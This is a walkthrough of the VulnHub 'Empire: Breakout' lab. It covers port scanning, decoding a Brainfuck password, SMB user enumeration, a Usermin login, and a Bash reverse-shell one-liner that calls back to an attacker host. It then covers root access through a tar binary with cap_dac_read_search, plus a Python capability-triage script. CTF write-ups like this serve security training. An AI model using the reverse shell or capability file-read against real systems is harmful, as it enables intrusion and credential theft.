# Empire : breakout

Hello, in this writeup we will solve the Empire: Breakout machine from VulnHub, which you can download from the link below.

{% embed url="<https://www.vulnhub.com/entry/empire-breakout,751/>" %}
machine link
{% endembed %}

After starting the machine in VMware, it prints its IP address on the console, so no host discovery is needed.

<figure><img src="/files/j3daRetEDjPs0zFlUUkO" alt=""><figcaption></figcaption></figure>

### First step: gaining access

Scanning the machine with Nmap over the full port range, `nmap -T5 -p- 192.168.1.108`,

shows that ports 80, 139, 445, 10000 and 20000 are open: HTTP, SMB (139/445) and two HTTPS admin panels, Webmin on 10000 and Usermin on 20000.

<figure><img src="/files/daOzIIn4T35Mpp654Pwj" alt=""><figcaption></figcaption></figure>

Since port 80 is open, let's visit the web server running on the machine.

<figure><img src="/files/NmlUZjXS0VZLghysVFGQ" alt=""><figcaption></figcaption></figure>

A default Apache landing page. Looking further, I found a comment at the end of the page source.

<figure><img src="/files/z6Q6rlhA7oernxBPKQC2" alt=""><figcaption></figcaption></figure>

The comment claims the message is "encrypted", but it isn't: the string of `+`, `-`, `<`, `>`, `[`, `]` and `.` characters is a Brainfuck program (an esoteric programming language, not a cipher), as ChatGPT also pointed out when I asked it what the text was. Running the program in any Brainfuck interpreter prints what looks like a password.

<figure><img src="/files/dT0hzOEajCivyBOuMod8" alt=""><figcaption></figcaption></figure>

The program's output is <mark style="color:red;">.2uqPEfj3D\<P'a-3</mark> .

Next, enumerate the SMB service with enum4linux:

```
enum4linux -a 192.168.1.108
```

<figure><img src="/files/Lgn3odj9nYoFkxvzQ3kN" alt=""><figcaption></figcaption></figure>

Nice, enum4linux lists a local user, <mark style="color:red;">cyber</mark>. We now have a username and a password to try; we just need somewhere to log in.

From the Nmap scan we know that Usermin is listening on port 20000, so visiting `https://192.168.1.108:20000/` gives its login page.

<figure><img src="/files/rSDPF1vO2eMzeBaOboXF" alt=""><figcaption></figcaption></figure>

Trying the credentials `cyber:.2uqPEfj3D<P'a-3` works.

Once logged in, there is a terminal icon in the sidebar that opens a shell in the web page, running as cyber on the box. A browser terminal is awkward to work in, so I started an ncat listener on port 1234 on my attacking machine

<figure><img src="/files/Ypm8Z58ke4DFlChgA57A" alt=""><figcaption></figcaption></figure>

and got a reverse shell by running the following Bash one-liner from PayloadsAllTheThings in the web terminal. The IP and port in it are the repository's placeholders: replace `10.0.0.1` with your attacking machine's address and `4242` with the listener port (1234 here).

`bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`

<figure><img src="/files/lEWcDMGC48FsVnLcWpeA" alt=""><figcaption></figcaption></figure>

Now we have the user flag.

<figure><img src="/files/sMPF1zHlrVlyIudVMnNA" alt=""><figcaption></figcaption></figure>

### Second step: privesc

Searching for binaries with Linux file capabilities set, using `getcap -r / 2>/dev/null`

<figure><img src="/files/Bls7qB9rGL2yxPDI1xHi" alt=""><figcaption></figcaption></figure>

Interesting! There is a copy of the tar binary in /home/cyber with the cap_dac_read_search capability, which bypasses file read and directory search permission checks, so this tar can read any file on the system regardless of its owner. Further enumeration turns up a hidden backup file, /var/backups/.old\_pass.bak.

<figure><img src="/files/TiOi3aWkgabgkFNa4Bah" alt=""><figcaption></figcaption></figure>

We can't read .old\_pass.bak ourselves because we lack permission, but the capability-bearing tar can, so we archive the file with it and then read the archive.

`./tar -cvf pass /var/backups/.old_pass.bak` and then `cat pass`. No extraction step is needed: `-cvf` without `z` writes a plain, uncompressed ustar stream in which the file's bytes follow a 512-byte header unchanged, so `cat` or `strings` on the archive shows the content directly. The same trick would work on /etc/shadow or anything under /root, since the capability does not care which file is being read.

<figure><img src="/files/rpkdGl7pM7GZqsL269J7" alt=""><figcaption></figcaption></figure>

Now we have the root password, `Ts&4&YurgtRX(=~h`, and can switch to root with it.
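Two things are worth automating in this step: spotting the dangerous capability in `getcap` output among the harmless ones (ping's cap_net_raw is normal), and understanding why `cat` on the archive works. The script below is an added example, not the writeup's own commands; the getcap lines it parses are constructed sample output modelled on this box, and the `/usr/local/bin/helper` entry and the backup content are made up for the test.

```python
# Added example (not from the original writeup): triage getcap output for
# capabilities that let a binary read or write files it has no permission for,
# and show why `cat` on a plain tar archive reveals a member's content.
import io
import re
import tarfile

# Capabilities worth flagging on a binary an unprivileged user can run (subset
# of capabilities(7)); the value says what the capability buys an attacker.
DANGEROUS_CAPS = {
    "cap_dac_read_search": "bypass read/search permission checks (read any file)",
    "cap_dac_override": "bypass read/write/execute permission checks",
    "cap_setuid": "change UID, e.g. setuid(0)",
    "cap_setgid": "change GID",
    "cap_sys_admin": "mount, many admin operations, effectively root",
    "cap_sys_ptrace": "attach to and control other processes",
    "cap_chown": "change file ownership",
    "cap_fowner": "bypass ownership checks on file operations",
}

# getcap prints "<path> <capset>", where the capset looks like
# "cap_x=ep", "cap_x+ep" or "cap_x,cap_y=ep" depending on the libcap version.
GETCAP_RE = re.compile(r"^(?P<path>\S+)\s+(?P<caps>.+)$")


def triage_getcap(output: str) -> list[tuple[str, str, str]]:
    """Return (path, capability, why it matters) for every flagged binary."""
    hits = []
    for line in output.splitlines():
        m = GETCAP_RE.match(line.strip())
        if not m:
            continue
        path = m.group("path")
        # Split the capset into individual names, dropping the =ep/+ep flags.
        for clause in re.split(r"[\s,]+", m.group("caps")):
            name = re.split(r"[=+-]", clause, 1)[0].lower()
            if name in DANGEROUS_CAPS:
                hits.append((path, name, DANGEROUS_CAPS[name]))
    return hits


def tar_member_is_plaintext(content: bytes, name: str) -> bool:
    """Build an uncompressed tar in memory and check the content sits in it raw.

    `tar -cvf` (no `z`) writes a ustar stream: 512-byte headers followed by the
    member bytes unmodified, which is why `cat` or `strings` on the archive
    shows the backup password without extracting it first.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:  # mode "w": no compression
        info = tarfile.TarInfo(name=name)
        info.size = len(content)
        tar.addfile(info, io.BytesIO(content))
    return content in buf.getvalue()


# Constructed sample getcap output, modelled on this box plus one invented entry.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/home/cyber/tar cap_dac_read_search=ep
/usr/local/bin/helper cap_setuid+ep
"""

if __name__ == "__main__":
    for path, cap, why in triage_getcap(SAMPLE_GETCAP):
        print(f"{path}: {cap} -> {why}")
    # Constructed backup content, standing in for /var/backups/.old_pass.bak.
    print(tar_member_is_plaintext(b"made-up-password\n", "var/backups/.old_pass.bak"))
```

If the capable binary had been built with `tar -czf` in mind, or the target only allowed gzip output, the bytes would no longer be visible to `cat`; in that case `./tar -xf` (or `zcat`) on the archive is the extra step the writeup did not need here.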

<figure><img src="/files/0BTNylHmrjSkajihPgpz" alt=""><figcaption></figcaption></figure>

Voila! We have the root flag.
